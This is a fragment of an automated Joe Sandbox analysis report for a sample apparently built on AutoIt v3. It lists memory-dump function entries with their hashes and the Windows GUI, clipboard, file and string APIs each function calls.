                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                        • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                        • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                        • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                        • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                        • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                        • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                        • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                        • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                        • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                        • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                        • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                        • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                        • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                        • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                        • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                        APIs
                        • DeleteObject.GDI32(?), ref: 004593D7
                        • DeleteObject.GDI32(?), ref: 004593F1
                        • DestroyWindow.USER32 ref: 00459407
                        • GetDesktopWindow.USER32 ref: 0045942A
                        • GetWindowRect.USER32(00000000), ref: 00459431
                        • SetRect.USER32 ref: 00459568
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                        • CreateWindowExW.USER32 ref: 004595BB
                        • GetClientRect.USER32(00000000,?,?,50000001,?,?,00000000,00000000,00000000), ref: 004595C8
                        • CreateWindowExW.USER32 ref: 00459615
                        • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000), ref: 00459635
                        • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                        • GlobalLock.KERNEL32(00000000), ref: 00459668
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00459678
                        • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                        • CloseHandle.KERNEL32(00000000), ref: 00459686
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00459694
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                        • GlobalFree.KERNEL32(00000000), ref: 004596C0
                        • CopyImage.USER32 ref: 004596EF
                        • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 0045973D
                        • ShowWindow.USER32(?,00000004), ref: 0045974B
                        • CreateWindowExW.USER32 ref: 0045979C
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                        • GetStockObject.GDI32(00000011), ref: 004597B7
                        • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                        • GetTextFaceW.GDI32(00000000,00000040,00000190), ref: 004597CD
                        • GetDeviceCaps.GDI32(00000000,0000005A,?,50000001,?,?,00000000,00000000,00000000), ref: 004597D6
                        • DeleteDC.GDI32(00000000), ref: 004597E1
                        • _wcslen.LIBCMT ref: 00459800
                        • _wcscpy.LIBCMT ref: 0045981F
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                        • GetDC.USER32(?), ref: 004598DE
                        • SelectObject.GDI32(00000000,?), ref: 004598EE
                        • SelectObject.GDI32(00000000,?), ref: 00459919
                        • ReleaseDC.USER32(?,00000000), ref: 00459925
                        • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                        • ShowWindow.USER32(?,00000004), ref: 00459951
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 4040870279-2373415609
                        • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                        • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                        • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                        • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                        APIs
                        • GetSysColor.USER32(00000012), ref: 00441E64
                        • SetTextColor.GDI32(?,?), ref: 00441E6C
                        • GetSysColorBrush.USER32 ref: 00441E83
                        • GetSysColor.USER32(0000000F), ref: 00441E8F
                        • SetBkColor.GDI32(?,?), ref: 00441EAA
                        • SelectObject.GDI32(?,?), ref: 00441EBA
                        • InflateRect.USER32 ref: 00441EF0
                        • GetSysColor.USER32(00000010), ref: 00441EF8
                        • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                        • FrameRect.USER32 ref: 00441F10
                        • DeleteObject.GDI32(?), ref: 00441F1B
                        • InflateRect.USER32 ref: 00441F75
                        • FillRect.USER32 ref: 00441FB6
                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                          • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                          • Part of subcall function 00433D5C: GetSysColorBrush.USER32 ref: 00433DBF
                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                          • Part of subcall function 00433D5C: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                          • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                          • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                          • Part of subcall function 00433D5C: InflateRect.USER32 ref: 00433E54
                          • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                          • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                          • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                        • String ID:
                        • API String ID: 69173610-0
                        • Opcode ID: 8dcc96ffe47a2fe9ff8bda72551eec77f249f3f8d307ad86c55682b188451424
                        • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                        • Opcode Fuzzy Hash: 8dcc96ffe47a2fe9ff8bda72551eec77f249f3f8d307ad86c55682b188451424
                        • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-3360698832
                        • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                        • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                        • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                        • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                        APIs
                        • GetSysColor.USER32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433D81
                        • SetTextColor.GDI32(?,00000000), ref: 00433D89
                        • GetSysColor.USER32(00000012,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DA3
                        • SetTextColor.GDI32(?,?), ref: 00433DAB
                        • GetSysColorBrush.USER32 ref: 00433DBF
                        • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DCB
                        • CreateSolidBrush.GDI32(?), ref: 00433DD4
                        • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,?,?,?,?,?,?,00441E27,?), ref: 00433DEB
                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                        • SelectObject.GDI32(?,00000000), ref: 00433E0D
                        • SetBkColor.GDI32(?,?), ref: 00433E19
                        • SelectObject.GDI32(?,?), ref: 00433E29
                        • InflateRect.USER32 ref: 00433E54
                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                        • GetWindowLongW.USER32 ref: 00433E8A
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                        • GetWindowTextW.USER32(00000000,00000000,00000105,?,?,?,?,?,?,?,?,?,?,00441E27,?,?), ref: 00433EE1
                        • InflateRect.USER32 ref: 00433F13
                        • DrawFocusRect.USER32 ref: 00433F1F
                        • GetSysColor.USER32(00000011), ref: 00433F2E
                        • SetTextColor.GDI32(?,00000000), ref: 00433F36
                        • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                        • SelectObject.GDI32(?,?), ref: 00433F63
                        • DeleteObject.GDI32(?), ref: 00433F70
                        • SelectObject.GDI32(?,?), ref: 00433F78
                        • DeleteObject.GDI32(00000000), ref: 00433F7B
                        • SetTextColor.GDI32(?,?), ref: 00433F83
                        • SetBkColor.GDI32(?,?), ref: 00433F8F
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                        • String ID:
                        • API String ID: 1582027408-0
                        • Opcode ID: f8c5402a38c71291302956bc3de414c49dfb5bc194e0e16dffe31d47370e21a6
                        • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                        • Opcode Fuzzy Hash: f8c5402a38c71291302956bc3de414c49dfb5bc194e0e16dffe31d47370e21a6
                        • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                        APIs
                        • OpenClipboard.USER32(?), ref: 0046C635
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                        • GetClipboardData.USER32 ref: 0046C64F
                        • CloseClipboard.USER32 ref: 0046C65D
                        • GlobalLock.KERNEL32(00000000), ref: 0046C688
                        • CloseClipboard.USER32 ref: 0046C692
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                        • GetClipboardData.USER32 ref: 0046C6DD
                        • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                        • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                        • CloseClipboard.USER32 ref: 0046C866
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                        • String ID: HH
                        • API String ID: 589737431-2761332787
                        • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                        • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                        • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                        • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                        APIs
                        • GetCursorPos.USER32(?), ref: 00456692
                        • GetDesktopWindow.USER32 ref: 004566AA
                        • GetWindowRect.USER32(00000000), ref: 004566B1
                        • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                        • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                        • DestroyWindow.USER32 ref: 00456731
                        • CreateWindowExW.USER32 ref: 00456779
                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                        • IsWindowVisible.USER32(?), ref: 00456812
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                        • GetWindowRect.USER32(?,?), ref: 0045685C
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                        • GetMonitorInfoW.USER32 ref: 00456894
                        • CopyRect.USER32(?,?), ref: 004568A8
                        • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                        • String ID: ($,$tooltips_class32
                        • API String ID: 541082891-3320066284
                        • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                        • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                        • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                        • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                        APIs
                        • _wcslen.LIBCMT ref: 00454DCF
                        • _wcslen.LIBCMT ref: 00454DE2
                        • __wcsicoll.LIBCMT ref: 00454DEF
                        • _wcslen.LIBCMT ref: 00454E04
                        • __wcsicoll.LIBCMT ref: 00454E11
                        • _wcslen.LIBCMT ref: 00454E24
                        • __wcsicoll.LIBCMT ref: 00454E31
                          • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                        • LoadImageW.USER32 ref: 00454E65
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                        • LoadImageW.USER32 ref: 00454EB7
                        • LoadImageW.USER32 ref: 00454EFB
                        • LoadImageW.USER32 ref: 00454F2C
                        • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                        • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                        • DestroyIcon.USER32(?), ref: 00454FA2
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 2511167534-1154884017
                        • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                        • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                        • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                        • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                        APIs
                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                        • _wcslen.LIBCMT ref: 00436B79
                        • _wcscpy.LIBCMT ref: 00436B9F
                        • _wcscat.LIBCMT ref: 00436BC0
                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                        • _wcscat.LIBCMT ref: 00436C2A
                        • _wcscat.LIBCMT ref: 00436C31
                        • __wcsicoll.LIBCMT ref: 00436C4B
                        • _wcsncpy.LIBCMT ref: 00436C62
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                        • API String ID: 1503153545-1459072770
                        • Opcode ID: db501695e3f9142d2b1fa6d3f411f192b9cf6827c411e2625b2bfe91f9970a36
                        • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                        • Opcode Fuzzy Hash: db501695e3f9142d2b1fa6d3f411f192b9cf6827c411e2625b2bfe91f9970a36
                        • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                        APIs
                          • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                        • _fseek.LIBCMT ref: 004527FC
                        • __wsplitpath.LIBCMT ref: 0045285C
                        • _wcscpy.LIBCMT ref: 00452871
                        • _wcscat.LIBCMT ref: 00452886
                        • __wsplitpath.LIBCMT ref: 004528B0
                        • _wcscat.LIBCMT ref: 004528C8
                        • _wcscat.LIBCMT ref: 004528DD
                        • __fread_nolock.LIBCMT ref: 00452914
                        • __fread_nolock.LIBCMT ref: 00452925
                        • __fread_nolock.LIBCMT ref: 00452944
                        • __fread_nolock.LIBCMT ref: 00452955
                        • __fread_nolock.LIBCMT ref: 00452976
                        • __fread_nolock.LIBCMT ref: 00452987
                        • __fread_nolock.LIBCMT ref: 00452998
                        • __fread_nolock.LIBCMT ref: 004529A9
                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
